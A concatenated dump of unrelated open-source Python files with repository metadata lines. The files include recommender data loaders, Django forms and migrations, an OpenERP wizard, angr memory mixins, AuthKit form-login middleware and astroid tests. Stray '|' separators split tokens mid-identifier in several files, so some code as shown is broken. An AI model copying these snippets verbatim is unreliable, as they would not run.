wea_df = wea_df.rename(columns = {'m': 'Month', 'd': 'Day'}, index=str)
# merging
| merged_df = pd.merge(pyo_df, wea_df)
merged_df = merged_df.drop(["Time zone", "Time"], axis=1)
return merged_df
def main():
df = cycling_weather()
return
if __name__ == "__main__":
main()
|
diego-carvalho/FAiR | app/src/loadData.py | Python | mit | 5,565 | 0.000719 | # -*- coding: utf-8 -*
import numpy as np
import sys
def load_data_test(file_test, window):
# read the test data and mount the matrix
file_test = open(file_test, 'r')
dic_u_test = {}
dic_i_test = {}
for line in file_test:
try:
line = line.rstrip()
values = line.split("::")
value_row = values[0]
value_col = values[1]
value_data = float(values[2])
# test = values[4]
if dic_u_test.get(value_row, False):
dic_u_test[value_row][value_col] = value_data
else:
dic_u_test[value_row] = {}
dic_u_test[value_row][value_col] = value_data
if dic_i_test.get(value_col, False):
dic_i_test[value_col][value_row] = value_data
else:
dic_i_test[value_col] = {}
dic_i_test[value_col][value_row] = value_data
except:
print(str(sys.exc_info()[0]))
print('error in format of test file: %s' % file_test.name)
window.loader_window.windowApp.destroy()
window.msgError('error in format of test file: %s' % file_test.name)
raise
file_test.close()
print('read the test data')
# reading end
# return the data matrix
return dic_u_test, dic_i_test
def load_data_training(file_training, window):
# read the training data and mount the matrix
file_training = open(file_training, 'r')
dic_u_training = {}
dic_i_training = {}
amount_ratings = 0
for line in file_training:
try:
amount_ratings += 1
line = line.rstrip()
values = line.split("::")
value_row = values[0]
value_col = values[1]
value_data = float(values[2])
# test = values[4]
if dic_u_training.get(value_row, False):
dic_u_training[value_row][value_col] = value_data
else:
dic_u_training[value_row] = {}
dic_u_training[value_row][value_col] = value_data
if dic_i_training.get(value_col, False):
dic_i_training[value_col][value_row] = value_data
else:
dic_i_training[value_col] = {}
dic_i_training[value_col][value_row] = value_data
except:
print(str(sys.exc_info()[0]))
print('error in format of training file: %s' % file_training.name)
window.loader_window.windowApp.destroy()
window.msgError('error in format of training file: %s' % file_training.name)
raise
file_training.close()
print('read the training data')
# reading end
# return the data matrix
return dic_u_training, dic_i_training, amount_ratings
def load_data_topN(file_top_n):
file_top_n = open(file_top_n, "r")
lines = []
ids = []
ratings = []
dic_u_top = {}
cont_u = 0
for line in file_top_n:
aux = line.split()
lines.append(aux[1:])
dic_u_top[cont_u] = aux[0]
cont_u += 1
for i in range(len(lines)):
if len(lines[i]) != 100:
print('i : %d l : %d' % (i, len(lines[i])))
id_aux = []
ra_aux = []
for j in range(len(lines[i])):
id_aux.append(lines[i][j].split(":")[0])
ra_aux.append(float(lines[i][j].split(":")[1]))
ids.append(id_aux)
ratings.append(ra_aux)
matrix_top_n = np.array(ids)
matrix_ratings = np.array(ratings)
file_top_n.close()
print('read the topN data')
# reading end
return dic_u_top, matrix_top_n, matrix_ratings
def load_data_mymedialite(file_top_n):
file_top_n = open(file_top_n, "r")
lines = []
ids = []
ratings = []
dic_u_top = {}
cont_u = 0
for line in file_top_n:
aux = line.split()
dic_u_top[cont_u] = aux[0]
cont_u += 1
aux = aux[1][1:]
aux = aux[:-1].split(",")
lines.append(aux)
for i in range(len(lines)):
if len(lines[i]) != 100:
print('i : %d l : %d' % (i, len(lines[i])))
id_aux = []
ra_aux = []
for j in range(len(lines[i])):
id_aux.append(lines[i][j].split(":")[0])
ra_aux.append(float(line | s[i][j].split(":")[1]))
ids.append(id_aux)
ratings.append(ra_aux)
matrix_top_n = np.array(ids)
matrix_ratings = np.array(ratings)
file_top_n.close()
print('read the topN data')
# reading end
return dic_u_top, matrix_top_n, matrix_ratings
def convert_file_mymedialite(file_top_n, output_file):
# read the training data and mount the ma | trix
file_top_n = open(file_top_n, 'r')
file_out = open(output_file + "file_mymedialite_topn.txt", 'w')
lines = []
ids = []
ratings = []
dic_u_top = {}
cont_u = 0
for line in file_top_n:
aux = line.split()
user = aux[0]
aux = aux[1][1:]
aux = aux[:-1].split(",")
file_out.write("%s %s\n" % (user, " ".join(aux)))
def load_data_feature(file_feature):
# create the dictionary of features
file_in = open(file_feature, "r")
dic_features = {}
amount_features = len(file_in.readline().split("::"))
for line in file_in:
line = line.rstrip()
values = line.split(" ")
values = list(map(int, values))
dic_features[str(values[0])] = values[1:]
file_in.close()
# reading end
return dic_features, amount_features
|
DemocracyClub/yournextrepresentative | ynr/apps/elections/migrations/0009_make_election_slug_unique.py | Python | agpl-3.0 | 356 | 0.002809 | from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("elections", "000 | 8_remove_artificial_start_and_end_dates")]
operations = [
migrations.AlterField(
model_name="election",
name="slug",
field=models.CharField(un | ique=True, max_length=128),
)
]
|
montenegroariel/sigos | apps/afiliados/forms.py | Python | gpl-3.0 | 5,885 | 0.003569 | import datetime
import qrcode
from django import forms
from django.conf import settings
from apps.complementos.afiliados.models import Plan
from lib.forms import EstiloForm
from apps.personas.models import Sexo
from apps.complementos.personas.models import EstadoCivil
from .models import Titular, Adherente, Parentesco
from apps.empresas.models import Empresa
class TitularForm(EstiloForm, forms.ModelForm):
numero_ficha = forms.IntegerField(required=False, widget=forms.NumberInput())
dni = forms.CharField(required=True, widget=forms.NumberInput())
apellido = forms.CharField(required=True, widget=forms.TextInput())
nombre = forms.CharField(required=True, widget=forms.TextInput())
fecha_nacimiento = forms.DateField(required=False, widget=forms.DateInput())
sexo = forms.ModelChoiceField(required=False, queryset=Sexo.objects.all(), widget=forms.Select())
direccion = forms.CharField(required=True, widget=forms.TextInput())
telefono = forms.CharField(required=False, widget=forms.TextInput())
mail = forms.EmailField(required=False, widget=forms.EmailInput())
estado_civil = forms.ModelChoiceField(required=True, queryset=EstadoCivil.objects.all(), widget=forms.Select())
empresa = forms.ModelChoiceField(required= | True, queryset=Empresa.objects.all(), widget=forms.Select())
alta_afiliado = forms.BooleanField(required=False, widget=forms.CheckboxInput())
codigo_qr = forms.ImageField(required=False, widget=forms.FileInput())
codigo_seguridad = forms.IntegerField(required=False)
cuil = forms.CharField(required=False, widget=forms.TextInput())
plan = forms.ModelChoiceField(queryset=Plan.objects | .all(), widget=forms.Select())
pendiente_revision = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
causa_revision = forms.CharField(required=False, widget=forms.Textarea())
embarazada = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
meses_embarazo = forms.DateField(required=False, widget=forms.DateInput())
class Meta:
model = Titular
exclude = ['codigo']
# fields = '__all__'
def clean_nombre(self):
return self.cleaned_data["nombre"].upper()
def clean_apellido(self):
return self.cleaned_data["apellido"].upper()
def clean_codigo_qr(self):
if 'dni' in self.cleaned_data:
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=6,
border=2,
)
dni = self.cleaned_data['dni']
qr.add_data('http://sigos.seostax.com/qr/' + dni)
qr.make(fit=True)
img = qr.make_image()
img_path = settings.MEDIA_ROOT+'/qr/'+dni+'.png'
img.save(img_path)
self.cleaned_data['codigo_qr'] = 'qr/'+dni+'.png'
return self.cleaned_data['codigo_qr']
class AdherenteForm(EstiloForm, forms.ModelForm):
dni = forms.CharField(required=True, widget=forms.NumberInput())
apellido = forms.CharField(required=True, widget=forms.TextInput())
nombre = forms.CharField(required=True, widget=forms.TextInput())
direccion = forms.CharField(required=False, widget=forms.TextInput())
fecha_nacimiento = forms.DateField(required=True, widget=forms.DateInput())
sexo = forms.ModelChoiceField(required=False, queryset=Sexo.objects.all(), widget=forms.Select())
telefono = forms.CharField(required=False, widget=forms.TextInput())
titular = forms.ModelChoiceField(label='', required=True, queryset=Titular.objects.all(),
widget=forms.Select(attrs=({'hidden': 'hidden'})))
parentesco = forms.ModelChoiceField(required=True, queryset=Parentesco.objects.all(), widget=forms.Select())
certificado_escolaridad = forms.BooleanField(required=False, widget=forms.CheckboxInput())
certificado_escolaridad_fecha = forms.DateField(required=False)
codigo_seguridad = forms.IntegerField(required=False)
plan = forms.ModelChoiceField(queryset=Plan.objects.all(), widget=forms.Select())
pendiente_revision = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
causa_revision = forms.CharField(required=False, widget=forms.Textarea())
embarazada = forms.BooleanField(required=False, initial=False, widget=forms.CheckboxInput())
meses_embarazo = forms.DateField(required=False, widget=forms.DateInput())
def clean_categoria(self):
data = self.cleaned_data['categoria']
return data
class Meta:
model = Adherente
exclude = ['codigo']
def clean_fecha_nacimiento(self):
data = self.cleaned_data["fecha_nacimiento"]
today = datetime.date.today()
resultado = today.year - data.year - ((today.month, today.day) < (data.month, data.day))
#if resultado <=1:
# raise ValidationError("Verifique la fecha ingresada, este Adherente todavia no cumplio un año")
return data
def clean_nombre(self):
return self.cleaned_data["nombre"].upper()
def clean_apellido(self):
return self.cleaned_data["apellido"].upper()
def clean_codigo_qr(self):
if 'dni' in self.cleaned_data:
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=6,
border=2,
)
dni = self.cleaned_data['dni']
qr.add_data('http://sigos.seostax.com/qr/' + dni)
qr.make(fit=True)
img = qr.make_image()
img_path = settings.MEDIA_ROOT+'/qr/'+dni+'.png'
img.save(img_path)
self.cleaned_data['codigo_qr'] = 'qr/'+dni+'.png'
return self.cleaned_data['codigo_qr']
|
bjornaa/ladim | examples/obstacle/animate.py | Python | mit | 1,379 | 0 | import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from postladim import ParticleFile
from gridforce_analytic impo | rt Grid
# Particle file
particle_file = "obstacle.nc"
# Get the grid information
grid = Grid(None)
imax, jmax = grid.imax, grid.jmax
# L = grid.L
R = grid.R
X0 = grid.X0
# particle_file
pf = ParticleFile(particle_file)
num_times = pf.num_times
# Set up the plot area
fig = plt.figure(figsize=(12, 8))
ax = plt.axes(xlim=(0, imax), ylim=(0, jmax), aspect="equal")
# Plot the semicircular obstacle
circle = plt.Circle((X0, 0), R, color="g")
ax.add_artist(circle)
# Plot initial particle distribution |
X, Y = pf.position(0)
particle_dist, = ax.plot(X, Y, ".", color="red", markeredgewidth=0.5, lw=0.5)
# title = ax.set_title(pf.time(0))
time0 = pf.time(0) # Save start-time
timestr = "00:00"
timestamp = ax.text(0.02, 0.93, timestr, fontsize=16, transform=ax.transAxes)
# Update function
def animate(t):
X, Y = pf.position(t)
particle_dist.set_data(X, Y)
# Time since start in minutes
dtime = (pf.time(t) - time0) / 60
dtimestr = str(dtime)
timestamp.set_text(dtimestr)
return particle_dist, timestamp
# Do the animation
anim = FuncAnimation(
fig,
animate,
frames=num_times,
interval=20,
repeat=True,
repeat_delay=500,
blit=True,
)
# anim.save("obstacle.mp4")
plt.show()
|
jss-emr/openerp-7-src | openerp/addons/account_budget/wizard/account_budget_crossovered_summary_report.py | Python | agpl-3.0 | 2,217 | 0.002255 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>) | .
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# | published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_budget_crossvered_summary_report(osv.osv_memory):
"""
This wizard provides the crossovered budget summary report'
"""
_name = 'account.budget.crossvered.summary.report'
_description = 'Account Budget crossvered summary report'
_columns = {
'date_from': fields.date('Start of period', required=True),
'date_to': fields.date('End of period', required=True),
}
_defaults= {
'date_from': lambda *a: time.strftime('%Y-01-01'),
'date_to': lambda *a: time.strftime('%Y-%m-%d'),
}
def check_report(self, cr, uid, ids, context=None):
if context is None:
context = {}
data = self.read(cr, uid, ids, context=context)[0]
datas = {
'ids': context.get('active_ids',[]),
'model': 'crossovered.budge',
'form': data
}
datas['form']['report'] = 'analytic-one'
return {
'type': 'ir.actions.report.xml',
'report_name': 'crossovered.budget.report',
'datas': datas,
}
account_budget_crossvered_summary_report()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
angr/angr | angr/storage/memory_mixins/paged_memory/page_backer_mixins.py | Python | bsd-2-clause | 8,238 | 0.005705 | from mmap import mmap
from typing import Union, List, Generator, Tuple
import logging
import claripy
import cle
from .paged_memory_mixin import PagedMemoryMixin
l = logging.getLogger(__name__)
BackerType = Union[bytes,bytearray,List[int]]
BackerIterType = Generator[Tuple[int,BackerType],None,None]
# since memoryview isn't pickleable, we make do...
class NotMemoryview:
def __init__(self, obj, offset, size):
self.obj = obj
self.offset = offset
self.size = size
def __getitem__(self, k):
return memoryview(self.obj)[self.offset:self.offset+self.size][k]
def __setitem__(self, k, v):
memoryview(self.obj)[self.offset:self.offset+self.size][k] = v
class ClemoryBackerMixin(PagedMemoryMixin):
def __init__(self, cle_memory_backer: Union[None, cle.Loader, cle.Clemory] = None, **kwargs):
super().__init__(**kwargs)
if isinstance(cle_memory_backer, cle.Loader):
self._cle_loader = cle_memory_backer
self._clemory_backer = cle_memory_backer.memory
elif isinstance(cle_memory_backer, cle.Clemory):
self._cle_loader = None
self._clemory_backer = cle_memory_backer
else:
self._cle_loader = None
self._clemory_backer = None
def copy(self, memo):
o = super().copy(memo)
o._clemory_backer = self._clemory_backer
o._cle_loader = self._cle_loader
return o
def _initialize_page(self, pageno, force_default=False, **kwargs):
if self._clemory_backer is None or force_default:
return super()._initialize_page(pageno, **kwargs)
addr = pageno * self.page_size
try:
backer_iter: BackerIterType = self._clemory_backer.backers(addr)
backer_start, backer = next(backer_iter)
except StopIteration:
return super()._initialize_page(pageno, **kwargs)
if backer_start >= addr + self.page_size:
return super()._initialize_page(pageno, **kwargs)
# Load data from backere
data = self._data_from_backer(addr, backer, backer_start, backer_iter)
permissions = self._cle_permissions_lookup(addr)
if permissions is None:
# There is no segment mapped at the start of the page.
# Maybe the end of the page is mapped instead?
permissions = self._cle_permissions_lookup (addr + self.page_size - 1)
# see if this page supports creating without copying
if type(data) is NotMemoryview:
try:
new_from_shared = self.PAGE_TYPE.new_from_shared
except AttributeError:
data = claripy.BVV(bytes(data[:]))
else:
return new_from_shared(data, **self._page_kwargs(pageno, permissions))
new_page = PagedMemoryMixin._initialize_default_page(self, pageno, permissions=permissions, **kwargs)
new_page.store(0, data, size=self.page_size, page_addr=pageno*self.page_size, endness='Iend_BE', memory=self,
**kwargs)
return new_page
def _data_from_backer(self, addr: int, backer: BackerType, backer_start: int,
backer_iter: BackerIterType) -> claripy.ast.BV:
# initialize the page
if isinstance(backer, (bytes, bytearray, mmap)):
return self._data_from_bytes_backer(addr, backer, backer_start, backer_iter)
elif isinstance(backer, list):
return self._data_from_lists_backer(addr, backer, backer_start, backer_iter)
raise TypeError("Unsupported backer type %s." % type(backer))
def _calc_page_starts(self, addr: int, backer_start: int, backer_length: int) -> Tuple[int,int,int]:
# lord help me. why do I keep having to write code that looks like this
# why have I found myself entangled in a briar patch of address spaces embedded in other address spaces
if addr >= backer_start:
backer_first_relevant_byte = addr - backer_start
page_first_relevant_byte = 0
else:
backer_first_relevant_byte = 0
page_first_relevant_byte = backer_start - addr
transfer_size = backer_length - backer_first_relevant_byte
if page_first_relevant_byte + transfer_size > self.page_size:
transfer_size = self.page_size - page_first_relevant_byte
return backer_first_relevant_byte, page_first_relevant_byte, transfer_size
def _data_from_bytes_backer(self, addr: int, backer: Union[bytes,bytearray], backer_start: int,
backer_iter: Generator[Tuple[int,Union[bytes,bytearray]],None,None]) -> claripy.ast.BV:
if backer_start <= addr and backer_start + len(backer) >= addr + self.page_size:
# fast case
data = NotMemoryview(backer, addr-backer_start, self.page_size)
else:
page_data = bytearray(self.page_size)
while backer_start < addr + self.page_size:
backer_first_relevant_byte, page_first_relevant_byte, transfer_size = \
self._calc_page_starts(addr, backer_start, len(backer))
backer_relevant_data = memoryview(backer)[backer_first_relevant_byte:backer_first_relevant_byte+transfer_size]
page_data[page_first_relevant_byte:page_first_relevant_byte+transfer_size] = backer_relevant_data
try:
backer_start, backer = next(backer_iter)
except StopIteration:
break
data = claripy.BVV(bytes(page_data))
return data
def _data_from_lists_backer(self, addr: int, backer: List[int], backer_start: int,
backer_iter: Generator[Tuple[int,List[int]],None,None]) -> claripy.ast.BV:
page_data = [0] * self.page_size
while backer_start < addr + self.page_size:
backer_first_relevant_byte, page_first_relevant_byte, transfer_size = \
self._calc_page_starts(addr, backer_start, len(backer))
backer_relevant_data = backer[backer_first_relevant_byte:backer_first_relevant_byte + transfer_size]
page_data[page_first_relevant_byte:page_first_relevant_byte + transfer_size] = backer_relevant_data
try:
backer_start, backer = next(backer_iter)
except StopIteration:
break
data = claripy.Concat(*map(lambda v: claripy.BVV(v, self.state.arch.byte_width), page_data))
return data
def _cle_permissions_lookup(self, addr):
if self._cle_loader is None:
return None
seg = self._cle_loader.find_segment_containing(addr, skip_pseudo_objects=False)
if seg is None:
return None
out = 0
if seg.is_readable: out |= 1
if seg.is_writable: out |= 2
if seg.is_executable: out |= 4
return out
class DictBackerMixin(PagedMemoryMixin):
def __init__(self, dict_memory_backer=None, **kwargs):
super().__init__(**kwargs)
self._dict_memory_backer = dict_memory_backer
def copy(self, memo):
o = super().copy(memo)
o._dict_memory_backer = self._dict_memory_backer
return o
def _initialize_page(self, pageno: int, force_default=False, **kwargs):
page_addr = pageno * self.page_size
if self._dict_memory_backer is None or force_default:
return super()._initialize_page(pageno, **kwargs)
new_page = None
for addr, byte in self._dict_memory_backer.items():
if page | _addr <= addr < page_addr + self.page_size:
if new_page is None:
kwargs['allow_default'] = True
new_page = PagedMemoryMixin._initialize_default_page(self, pageno, **kwargs)
new_page.store(addr % self.page_size,
claripy.BVV(byte[0] if type(byte) is bytes else byte, self.state.arch.byte_width),
size=1, endness='Iend_BE', page_addr=page_addr, memory=self, **kwargs)
if n | ew_page is None:
return super()._i |
cedadev/AuthKit | authkit/authenticate/form.py | Python | mit | 10,231 | 0.004692 | # -*- coding: utf-8 -*-
"""Form and cookie based authentication middleware
As with all the other AuthKit middleware, this middleware is described in
detail in the AuthKit manual and should be used via the
``authkit.authenticate.middleware`` function.
The option form.status can be set to "200 OK" if the Pylons error document
middleware is intercepting the 401 response and just showing the standard 401
error document. This will not happen in recent versions of Pylons (0.9.6)
because the multi middleware sets the environ['pylons.error_call'] key so that
the error documents middleware doesn't intercept the response.
From AuthKit 0.4.1 using 200 OK when the form is shown is now the default.
This is so that Safari 3 Beta displays the page rather than trying to
handle the response itself as a basic or digest authentication.
"""
from paste.auth.form import AuthFormHandler
from paste.request import parse_formvars
from authkit.authenticate import get_template, valid_password, \
get_authenti | cate_function, strip_base, RequireEnvironKey, \
AuthKitAuthHandler
from authkit.authenticate.multi import MultiHandler, status_checker
import inspect
import logging
import urllib
log = logging.getLogger('authkit.authenticate.form')
def user_data(state):
return 'User data string'
def template(method=False):
t = """\
<html>
<head><title>Please Sign In</title></head>
<body>
<h1>Please Sign In</h1>
<form action="%s" method="post" | >
<dl>
<dt>Username:</dt>
<dd><input type="text" name="username"></dd>
<dt>Password:</dt>
<dd><input type="password" name="password"></dd>
</dl>
<input type="submit" name="authform" value="Sign In" />
</form>
</body>
</html>
"""
if method is not False:
t = t.replace('post', method)
return t
class AttributeDict(dict):
def __getattr__(self, name):
if not self.has_key(name):
raise AttributeError('No such attribute %r'%name)
return self.__getitem__(name)
def __setattr__(self, name, value):
raise NotImplementedError(
'You cannot set attributes of this object directly'
)
class FormAuthHandler(AuthKitAuthHandler, AuthFormHandler):
def __init__(
self,
app,
charset=None,
status="200 OK",
method='post',
action=None,
user_data=None,
**p
):
AuthFormHandler.__init__(self, app, **p)
self.status = status
self.content_type = 'text/html'
self.charset = charset
if self.charset is not None:
self.content_type = self.content_type + '; charset='+charset
self.method = method
self.action = action
self.user_data = user_data
def on_authorized(self, environ, start_response):
if self.user_data is not None:
state = environ.get('wsgiorg.state')
if not state:
environ['wsgiorg.state'] = state = AttributeDict()
state['environ'] = environ
state['start_response'] = start_response
environ['paste.auth_tkt.set_user'](userid=environ['REMOTE_USER'], user_data=self.user_data(state))
else:
environ['paste.auth_tkt.set_user'](userid=environ['REMOTE_USER'])
return self.application(environ, start_response)
def __call__(self, environ, start_response):
# Shouldn't ever allow a response if this is called via the
# multi handler
username = environ.get('REMOTE_USER','')
formvars = parse_formvars(environ, include_get_vars=True)
username = formvars.get('username')
password = formvars.get('password')
if username and password:
if self.authfunc(environ, username, password):
log.debug("Username and password authenticated successfully")
environ['AUTH_TYPE'] = 'form'
environ['REMOTE_USER'] = username
environ['REQUEST_METHOD'] = 'GET'
environ['CONTENT_LENGTH'] = ''
environ['CONTENT_TYPE'] = ''
del environ['paste.parsed_formvars']
return self.on_authorized(environ, start_response)
else:
log.debug("Username and password authentication failed")
else:
log.debug("Either username or password missing")
action = self.action or construct_url(environ)
log.debug("Form action is: %s", action)
# Inspect the function to see if we can pass it anything useful:
args = {}
kargs = {'environ':environ}
if environ.has_key('gi.state'):
kargs['state'] = environ['gi.state']
for name in inspect.getargspec(self.template)[0]:
if kargs.has_key(name):
args[name] = kargs[name]
if self.method != 'post':
args['method'] = self.method
content = self.template(**args) % (action)
if self.charset is not None:
content = content.encode(self.charset)
writable = start_response(
self.status,
[
('Content-Type', self.content_type),
('Content-Length', str(len(content))),
# Added for IE compatibility - see #54
('Pragma', 'no-cache'),
('Cache-Control', 'no-cache'),
]
)
return [content]
def construct_url(environ, with_query_string=True, with_path_info=True,
script_name=None, path_info=None, querystring=None):
"""Reconstructs the URL from the WSGI environment.
You may override SCRIPT_NAME, PATH_INFO, and QUERYSTRING with
the keyword arguments.
"""
url = '://'
host = environ.get('HTTP_X_FORWARDED_HOST', environ.get('HTTP_HOST'))
port = None
if ':' in host:
host, port = host.split(':', 1)
else:
# See if the request is proxied
host = environ.get('HTTP_X_FORWARDED_HOST', environ.get('HTTP_X_FORWARDED_FOR'))
if host is not None:
# Request was proxied, get the correct data
host = environ.get('HTTP_X_FORWARDED_HOST')
port = environ.get('HTTP_X_FORWARDED_PORT')
if port is None and environ.get('HTTP_X_FORWARDED_SSL') == 'on':
port = '443'
if not port:
log.warning(
'No HTTP_X_FORWARDED_PORT or HTTP_X_FORWARDED_SSL found '
'in environment, cannot '
'determine the correct port for the form action. '
)
if not host:
log.warning(
'No HTTP_X_FORWARDED_HOST found in environment, cannot '
'determine the correct hostname for the form action. '
'Using the value of HTTP_HOST instead.'
)
host = environ.get('HTTP_HOST')
else:
# Request was not proxied
if environ['wsgi.url_scheme'] == 'https':
port = 443
if host is None:
host = environ.get('HTTP_HOST')
if port is None:
port = environ.get('SERVER_PORT')
url += host
if port:
if str(port) == '443':
url = 'https'+url
elif str(port) == '80':
url = 'http'+url
else:
# Assume we are running HTTP on a non-standard port
url = 'http'+url+':%s' % port
else:
url = 'http'+url
if script_name is None:
url += urllib.quote(environ.get('SCRIPT_NAME',''))
else:
url += urllib.quote(script_name)
if with_path_info:
if path_info is None:
url += urllib.quote(environ.get('PATH_INFO',''))
else:
url += urllib.quote(path_info)
if with_query_string:
if querystring is None:
if environ.get('QUERY_STRING'):
url += '?' + environ['QUERY_STRING']
elif querystring:
url += '?' + querystring
return url
def load_form_config(
app,
auth_conf,
app_conf= |
arju88nair/projectCulminate | venv/lib/python3.5/site-packages/astroid/tests/unittest_helpers.py | Python | apache-2.0 | 9,201 | 0.000109 | # Copyright (c) 2015-2016 Cara Vinson <ceridwenv@gmail.com>
# Copyright (c) 2015-2016 Claudiu Popa <pcmanticore@gmail.com>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/COPYING.LESSER
import unittest
import six
from six.moves import builtins
from astroid import builder
from astroid import exceptions
from astroid import helpers
from astroid import manager
from astroid import raw_building
from astroid import test_utils
from astroid import util
class TestHelpers(unittest.TestCase):
def setUp(self):
builtins_name = builtins.__name__
astroid_manager = manager.AstroidManager()
self.builtins = astroid_manager.astroid_cache[builtins_name]
self.manager = manager.AstroidManager()
def _extract(self, obj_name):
return self.builtins.getattr(obj_name)[0]
def _build_custom_builtin(self, obj_name):
proxy = raw_building.build_class(obj_name)
proxy.parent = self.builtins
return proxy
def assert_classes_equal(self, cls, other):
self.assertEqual(cls.name, other.name)
self.assertEqual(cls.parent, other.parent)
self.assertEqual(cls.qname(), other.qname())
def test_object_type(self):
pairs = [
('1', self._extract('int')),
('[]', self._extract('list')),
('{1, 2, 3}', self._extract('set')),
('{1:2, 4:3}', self._extract('dict')),
('type', self._extract('type')),
('object', self._extract('type')),
('object()', self._extract('object')),
('lambda: None', self._build_custom_builtin('function')),
('len', self._build_custom_builtin('builtin_function_or_method')),
('None', self._build_custom_builtin('NoneType')),
('import sys\nsys#@', self._build_custom_builtin('module')),
]
for code, expected in pairs:
node = builder.extract_node(code)
objtype = helpers.object_type(node)
self.assert_classes_equal(objtype, expected)
def test_object_type_classes_and_functions(self):
ast_nodes = builder.extract_node('''
def generator():
yield
class A(object):
def test(self):
self #@
@classmethod
def cls_method(cls): pass
@staticmethod
def static_method(): pass
A #@
A() #@
A.test #@
A().test #@
A.cls_method #@
A().cls_method #@
A.static_method #@
A().static_method #@
generator() #@
''')
from_self = helpers.object_type(ast_nodes[0])
cls = next(ast_nodes[1].infer())
self.assert_classes_equal(from_self, cls)
cls_type = helpers.object_type(ast_nodes[1])
self.assert_classes_equal(cls_type, self._extract('type'))
instance_type = helpers.object_type(ast_nodes[2])
cls = next(ast_nodes[2].infer())._proxied
self.assert_classes_equal(instance_type, cls)
expected_method_types = [
(ast_nodes[3], 'instancemethod' if six.PY2 else 'function'),
(ast_nodes[4], 'instancemethod' if six.PY2 else 'method'),
(ast_nodes[5], 'instancemethod' if si | x.PY2 else 'method'),
(ast_nodes[6], 'instancemethod' if six.PY2 else 'method'),
(ast_nodes[7], 'function'),
(ast_nodes[8], 'function'),
(ast_nodes[9], 'generator'),
]
for node, expected in expected_method_types:
node_type = helpers.object_type(n | ode)
expected_type = self._build_custom_builtin(expected)
self.assert_classes_equal(node_type, expected_type)
@test_utils.require_version(minver='3.0')
def test_object_type_metaclasses(self):
module = builder.parse('''
import abc
class Meta(metaclass=abc.ABCMeta):
pass
meta_instance = Meta()
''')
meta_type = helpers.object_type(module['Meta'])
self.assert_classes_equal(meta_type, module['Meta'].metaclass())
meta_instance = next(module['meta_instance'].infer())
instance_type = helpers.object_type(meta_instance)
self.assert_classes_equal(instance_type, module['Meta'])
@test_utils.require_version(minver='3.0')
def test_object_type_most_derived(self):
node = builder.extract_node('''
class A(type):
def __new__(*args, **kwargs):
return type.__new__(*args, **kwargs)
class B(object): pass
class C(object, metaclass=A): pass
# The most derived metaclass of D is A rather than type.
class D(B , C): #@
pass
''')
metaclass = node.metaclass()
self.assertEqual(metaclass.name, 'A')
obj_type = helpers.object_type(node)
self.assertEqual(metaclass, obj_type)
def test_inference_errors(self):
node = builder.extract_node('''
from unknown import Unknown
u = Unknown #@
''')
self.assertEqual(helpers.object_type(node), util.Uninferable)
def test_object_type_too_many_types(self):
node = builder.extract_node('''
from unknown import Unknown
def test(x):
if x:
return lambda: None
else:
return 1
test(Unknown) #@
''')
self.assertEqual(helpers.object_type(node), util.Uninferable)
def test_is_subtype(self):
ast_nodes = builder.extract_node('''
class int_subclass(int):
pass
class A(object): pass #@
class B(A): pass #@
class C(A): pass #@
int_subclass() #@
''')
cls_a = ast_nodes[0]
cls_b = ast_nodes[1]
cls_c = ast_nodes[2]
int_subclass = ast_nodes[3]
int_subclass = helpers.object_type(next(int_subclass.infer()))
base_int = self._extract('int')
self.assertTrue(helpers.is_subtype(int_subclass, base_int))
self.assertTrue(helpers.is_supertype(base_int, int_subclass))
self.assertTrue(helpers.is_supertype(cls_a, cls_b))
self.assertTrue(helpers.is_supertype(cls_a, cls_c))
self.assertTrue(helpers.is_subtype(cls_b, cls_a))
self.assertTrue(helpers.is_subtype(cls_c, cls_a))
self.assertFalse(helpers.is_subtype(cls_a, cls_b))
self.assertFalse(helpers.is_subtype(cls_a, cls_b))
@test_utils.require_version(maxver='3.0')
def test_is_subtype_supertype_old_style_classes(self):
cls_a, cls_b = builder.extract_node('''
class A: #@
pass
class B(A): #@
pass
''')
self.assertFalse(helpers.is_subtype(cls_a, cls_b))
self.assertFalse(helpers.is_subtype(cls_b, cls_a))
self.assertFalse(helpers.is_supertype(cls_a, cls_b))
self.assertFalse(helpers.is_supertype(cls_b, cls_a))
def test_is_subtype_supertype_mro_error(self):
cls_e, cls_f = builder.extract_node('''
class A(object): pass
class B(A): pass
class C(A): pass
class D(B, C): pass
class E(C, B): pass #@
class F(D, E): pass #@
''')
self.assertFalse(helpers.is_subtype(cls_e, cls_f))
self.assertFalse(helpers.is_subtype(cls_e, cls_f))
with self.assertRaises(exceptions._NonDeducibleTypeHierarchy):
helpers.is_subtype(cls_f, cls_e)
self.assertFalse(helpers.is_supertype(cls_f, cls_e))
def test_is_subtype_supertype_unknown_bases(self):
cls_a, cls_b = builder.extract_node('''
from unknown import Unknown
class A(Unknown): pass #@
class B(A): pass #@
''')
with self.assertRaises(exceptions._NonDeducibleTypeHierarchy):
helpers.is_subtype(cls_a, cls_b)
with self.assertRaises(exceptions._NonDeducibleTypeHierarchy):
helpers.is_supertype(cls_a, cls_b)
def test_is_subtype_supertype_unrelated_classes(self):
cls_a, cls_b = builder.extract_node('''
class A(object): pas |
jtpaasch/artifact | artifact/stats/console.py | Python | mit | 13,192 | 0 | # -*- coding: utf-8 -*-
"""A module for displaying stats in the console."""
import sys
import time
import curses
